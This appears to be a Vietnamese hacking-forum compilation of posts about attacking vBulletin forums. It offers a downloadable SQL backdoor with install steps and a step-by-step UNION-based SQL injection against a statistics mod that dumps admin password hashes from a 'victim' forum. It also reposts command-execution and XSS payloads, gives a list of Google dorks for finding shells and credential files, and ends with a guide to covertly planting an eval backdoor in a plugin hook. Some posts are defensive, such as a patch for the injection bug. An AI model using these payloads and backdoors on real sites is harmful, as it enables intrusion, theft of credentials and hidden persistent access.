Hidden Baby cho vBulletin (all version)

Screenshot:

Khả năng : Run query SQL tùy thích qua con backdoor (Select, Update, Drop ....)

Cách sử dụng

Quote:

+ Up thẳng vào thư mục forum vBB (ngang hàng với index.php). + Run: http://site.com/forum/backdoor.php?vnh= Câu lệnh sql hoặc + Admincp -> Product & Plugin Manager -> Add new plugin -> - Hook Location : tùy thích (mình hay dùng faq_complete) - Plugin PHP Code : Copy nguyên code ở dưới vào, bỏ "<?php" ở đầu và "?>" ở cuối đi - Plugin is active : Yes + Run : http://site.com/forum/faq.php?vnh= Câu lệnh sql

Download:

http://www.mediafire.com/?y9yz0gm6r4e4uxr

 Nguồn: VNHack.

Xem Thêm

[vBulletin] Admin Reset Tools - Công cụ dành cho Admin

Trong trường hợp bạn bị mất quyền Admin, mất hết Permission (hoặc bị thay đổi permission).

Công cụ này sẽ giúp bạn lấy lại group Admin và toàn quyền quản lí diễn đàn (Full Administrator Permission).

Demo:

Download:

File name: Admin-Reset-Tools.php

http://www.mediafire.com/?0279fvoisek8t27 (3 KB)

Password Unlock: junookyo

* Sử dụng:

Thay đổi thông tin DataBase như config.php của bạn:

// MySQL Info
    $host = 'localhost';
    $user = 'root';
    $password = '*****';
    $dbname = '*****'; 

Sau đó upload lên ngang hàng index forum và sử dụng.

P/S: Thực ra thì admin hoàn toàn có thể tự thay bằng cách vào phpMyAdmin, đây chỉ là công cụ giúp bạn khôi phục group Admin và toàn quyền quản lí Forum của mình nhanh nhất! :)

Nguồn: Junookyo !

Xem Thêm

[Report] ChangUonDyU Advanced Statistics - SQL injection

Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin.
Tuy nhiên kẻ lạ mặt chưa làm gì được

Sau khi được juno_okyo Report là có bug tại mod Changuondyu Static.
Mình đã kiểm tra lại các input, tất cả các input chỉ có 1 input được đưa vào truy vấn, đó là
$_REQUEST['listforumid']

Và quả thật là có bug SQLi. Đây là 1 lỗi cực kỳ nghiêm trọng và sai xót của coder (Còn nghiêm trọng hơn Bug Search VBB vì rất nhiều người đang sử dụng mod này).

Từ Bug này, chúng ta có thể lấy được dữ liệu từ database => Login vào admin => Login vào admincp => Up shell => blah blah

Ở đây DuyK sẽ không nói đến cách khai thác để đề phòng "Hacker chẻ châu" quậy phá mọi người (Hacker thực sự sẽ hiểu vấn đề ngay nên khỏi cần phải nói)

Vì rất nhiều người đang sử dụng mod này và chưa fix nên DuyK hi vọng mọi người sẽ lan truyền report này.

Để fix mod này. Các bạn vào: Admincp -> Plugin & product option -> Plugin manage -> ChangUonDyU - Advanced Statistics - Get Data -> EDIT

Bạn tìm đến dòng:
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);

Thay bằng:
$foruminid = intval($_REQUEST['listforumid']);

Report từ: DaiCa.Net - Forum newbie học hỏi

P/S by Juno_okyo:

Rất nhiều Diễn đàn đang sử dụng mod Statstics này nên mọi người nhanh chóng fix nhé.
Bug này được phát hiện từ mod tương tự của bác Chang cho MyBB, kiểm tra thì thấy mod bên vBB cũng dính.

Xem Thêm

vBulletin 2.0.3 Calendar.PHP Command Execution Vulnerability

Source: http://www.securityfocus.com/bid/5820/info

A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters.

An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.

http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22

where <command> signifies a command to be executed on the system.

Nguồn: http://www.exploit-db.com/exploits/21874/

Xem Thêm

vBulletin 2.0/2.2.x Cross Site Scripting Vulnerabilities

Source: http://www.securityfocus.com/bid/5997/info

vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks.

As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running vBulletin.

This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software.

http://<victim>/usercp.php?s=[Session ID]"><Script>alert(document.cookie);</Script>

Nguồn: http://www.exploit-db.com/exploits/21946/

Xem Thêm

vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability

Source: http://www.securityfocus.com/bid/6337/info

Problems with vBulletin could make it possible for an attacker to inject arbitrary HTML in vBulletin forum messages.

vBulletin does not sufficiently filter potentially malicious HTML code from posted messages. As a result, when a user chooses to view a message posting that contains malicious HTML code, the code contained in the message would be executed in the browser of the vulnerable user. This will occur in the context of the site hosting the vBulletin forum software.

Attackers may potentially exploit this issue to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user.

This should only be considered an issue if HTML has been enabled in messages. This option is not enabled by default and the vendor recommends that users do not enable it. If the option has been enabled, HTML will not be filtered at all.

*** This vulnerability has been further investigated. It has been reported by the vendor that this functionality is by disabled by default. Additionally, the risks of enabling this feature are documented in the user manual. Therefore, this is not a valid vulnerability, and will be removed from the SecurityFocus Vulnerability Database.

<b onMouseOver="alert(document.location);">Test!</b>

Nguồn: http://www.exploit-db.com/exploits/22077/

Xem Thêm

TUT SQL Statisics Forum MyBB

Xem Thêm

Hướng dẫn khai thác bug Changuondyu Static

Chú ý là đừng mang đi phá người ta quá nhé

Ở diễn đàn có sử dụng mod changuondyu static. Ví dụ: http://forumvictim.com/forum

Bạn truy cập vào: forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123

2 kái chữ bôi đỏ các bạn thay cho phù hợp (Ra ngoài forum home xem victim để giá trị result như nào, listforumid thì các bạn lấy 1 id chuyên mục của victim)

Tiếp theo bạn thử thêm dấu đóng ngoặc " ) " vào sau xem, nếu nó lỗi tức là site chưa fix

HTML Code:

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123

Nếu đã lỗi rồi thì các bạn thực hiện order by để tìm column:

HTML Code:

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) ORDER BY 11-- -

Bạn thay số 11 đỏ ở kia = số phù hợp, sao cho đó là số lớn nhất có thể mà khi đó ko bị lỗi (Thường thì là 10)

Giả sử mình đã tìm đc giá trị đó là 10 rồi thì tiếp theo sẽ select thôi.

HTML Code:

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(password),3,4,5,6,7,8,9,10 FROM user WHERE userid=1-- -

(Bạn có thể thử thay cái group_concat vào các số 6 hay 7 để hiển thị đc kquả tốt nhất)

Nếu xảy ra lỗi thì có thể forum này họ để VBB TABLE PREFIX, tức là table của họ ko phải dạng user nữa mà là kiểu như dct_user chẳng hạn, lúc này ta tìm tên table = cách:

HTML Code:

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 FROM information_schema.tables-- -

=> Xem tiền tố table là gì rồi bắt đầu khai thác

Nguồn: DaiCa.Net - DaiCa.info - Newbie học hỏi

Xem Thêm

Xuất hiện mã khai thác từ xa lỗi 0-day mới của PHP 5.4.3 trên Windows

Vào hôm qua 18/05, một thành viên có nickname là 0in đã gửi lên trang packetstormsecurity.org một mã khai thác từ xa (remote exploit) lợi dụng lỗ hổng trong hàm com_print_typeinfo của PHP phiên bản 5.4.3 dành cho nền tảng Windows.
Trong phần ghi chú, 0in là tác giả của mã khai thác này cho biết, anh ta đã thử nghiệm thành công trên máy Windows XP SP3 được cập nhật đầy đủ các bản vá. Và kết quả là PHP engine sẽ thực thi bất kỳ shellcode nào được chứa trong mã khai thác này.

Hiện vẫn chưa có thông báo và bản vá lỗi chính thức nào từ nhóm phát triển PHP cho lỗi 0-day mới nhất này, nhưng dưới đây là một số biện pháp để hạn chế các rủi ro khác:

• Chặn tất cả các chức năng upload file trong các ứng dụng PHP.
• Sử dụng IPS để lọc các shellcode đã được biết đến, ví dụ các shellcode có trong Metasploit.
• Cập nhật PHP lên phiên bản mới nhất để phòng chống các lỗ hổng khác như CVE-2012-2336 được công bố vào đầu tháng này.
• Sử dụng Host-IPS để chặn bất kỳ các lỗi buffer overflow có thể có trong hệ thống.

(Theo Internet Storm Center (ISC))
Tham khảo:
http://isc.sans.edu/...PoC+in+the+wild
http://packetstormse...rg/files/112851

Nguồn: HVA

Xem Thêm

Google Hacking DataBase (GHDB)

Google Hacking involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific ver- sions of vulnerable Web applications. The following search query would locate all web pages that have that particular text contained within them. It is normal for default installations of applications to include their running version in every page they serve, e.g., "Powered by XOOPS 2.2.3 Final".
The following search query will locate all websites that have the words "admbook" and "version" in the title of the website. It also checks to ensure that the web page being accessed is a PHP file:
intitle:admbook intitle:version filetype:php
Another technique is searching for insecure coding practices in the public code indexed by Google Code Search or other source code search engines. One can even retrieve the username and pass- word list from Microsoft FrontPage servers by inputting the given microscript in Google search field:
"#-Frontpage-" inurl:administrators.pwd
Devices connected to the Internet can be found. A search string such as inurl:"ViewerFrame?Mode =" will find public web cameras.

Footholds

Examples of queries that can help a hacker gain a foothold into a web server

(intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")
(intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")
"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )
"Please re-enter your password It must match exactly"
inurl:"tmtrack.dll?"
inurl:polly/CP
intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login
intitle:MyShell 1.1.0 build 20010923
intitle:"YALA: Yet Another LDAP Administrator"
intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:"
inurl:"phpOracleAdmin/php" -download -cvs
PHPKonsole PHPShell filetype:php -echo
filetype:php HAXPLORER "Server Files Browser"
inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx
(inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")
intitle:"Web Data Administrator - Login"
"adding new user" inurl:addnewuser -"there are no domains"
PHP Shell (unprotected)
Public PHP FileManagers
+htpasswd +WS_FTP.LOG filetype:log
intitle:admin intitle:login

Files containing usernames

These files contain usernames, but no passwords... Still, google finding usernames on a web site...

site:extremetracking.com inurl:"login="
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
OWA Public folders & Address book
filetype:conf inurl:proftpd.conf -sample
filetype:log username putty
filetype:reg reg +intext:"internet account manager"
filetype:reg reg HKEY_CURRENT_USER username
+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"
inurl:php inurl:hlstats intext:"Server Username"
index.of perform.ini
"index of" / lck
inurl:admin filetype:asp inurl:userlist
inurl:admin inurl:userlist
sh_history files
bash_history files

Sensitive Directories

Google's collection of web sites sharing sensitive directories. The files contained in here will vary from sesitive to uber-secret!

allintext:"WebServerX Server at"
intitle:index.of ios -site:cisco.com
intitle:index.of cisco asa -site:cisco.com
intitle:index.of.config
allintitle:"FirstClass Login"
inurl:install.pl intext:"Reading path paramaters" -edu
"Warning: Installation directory exists at" "Powered by Zen Cart" -demo
"Welcome to the directory listing of" "NetworkActiv-Web-Server"
log inurl:linklint filetype:txt -"checking"
"Directory Listing for" "Hosted by Xerver"
intitle:"pictures thumbnails" site:pictures.sprintpcs.com
intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder
intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff
intitle:index.of WEB-INF
intitle:index.of /maildir/new/
filetype:ini Desktop.ini intext:mydocs.dll
filetype:torrent torrent
"Index of" rar r01 nfo Modified 2004
"Web File Browser" "Use regular expression"
intitle:"HFS /" +"HttpFileServer"
intitle:upload inurl:upload intext:upload -forum -shop -support -w3c
intitle:"index of" inurl:ftp (pub | incoming)
allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
intitle:index.of abyss.conf
intitle:"Index of /CFIDE/" administrator
"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )
intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org
intext:"Powered By: TotalIndex" intitle:"TotalIndex"
"intitle:Index.Of /" stats merchant cgi-* etc
intitle:"index of" intext:"content.ie5"
intitle:"index of" -inurl:htm -inurl:html mp3
index.of.dcim
intitle:"Directory Listing For" intext:Tomcat -int
intitle:"webadmin - /*" filetype:php directory filename permission
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
intitle:"Index of *" inurl:"my shared folder" size modified
intitle:index.of /AlbumArt_
intext:"d.aspx?id" || inurl:"d.aspx?id"
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
"index of" / picasa.ini
index.of.password

Xem Thêm

Chèn Backdoor vào VBB nhanh-gọn-nhẹ-hiệu quả

Hello, hnay DuyK sẽ hướng dẫn các bạn cách chèn 1 “cửa sau” vào VBB nhanh-gọn-nhẹ-hiệu quả:
Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?
Okê, chỉ cần 1 dòng đơn giản:

eval($_REQUEST['dct']);

Đầu tiên bạn cần truy cập vào: Plugin & product manager => Plugin manager => Tìm đến 1 plugin bất kì => EDIT => chèn dòng trên vào vị trí hợp lý (Nếu không hiểu lắm về cấu trúc php thì bạn có thể chèn vào đầu hoặc cuối)
Bạn cần chú ý vào “HOOK” mà bạn chèn. Bạn nào hiểu phần này thì okê rồi. Còn nếu bạn nào chưa hiểu thì hãy chọn những kái nào có hook là:
ajax_start => Sau khi chèn chỉ việc truy cập /forum_path/ajax.php?dct=(Code php)
global_start (ko biết có nhớ lộn ko) => Sau khi chèn chỉ việc truy cập /forum_path/forum.php?dct=(Code php) — (Hoặc có thể run bất kì file php nào, vì chèn vào global mà)
……………..Blah blah……………..
Code php bạn có thể chèn truy vấn SQL, readfile….
Ví dụ
?dct=$duyk=readfile(‘includes/class_core.php’); echo $duyk; => view file class_core.php
?dct=$duyk=mysql_fetch_array(mysql_query(“select password from user where userid=1″)); echo $duyk['password'];
……………..
Demo:


Với việc chèn “Cửa hậu” nhỏ gọn như vậy nhưng rất hiệu quả :D Bằng cách này chúng ta có 1 cửa cho riêng mình để vào “nhà” của victim 1 cách lén lút nhất
Nguồn: DaiCa.info

Xem Thêm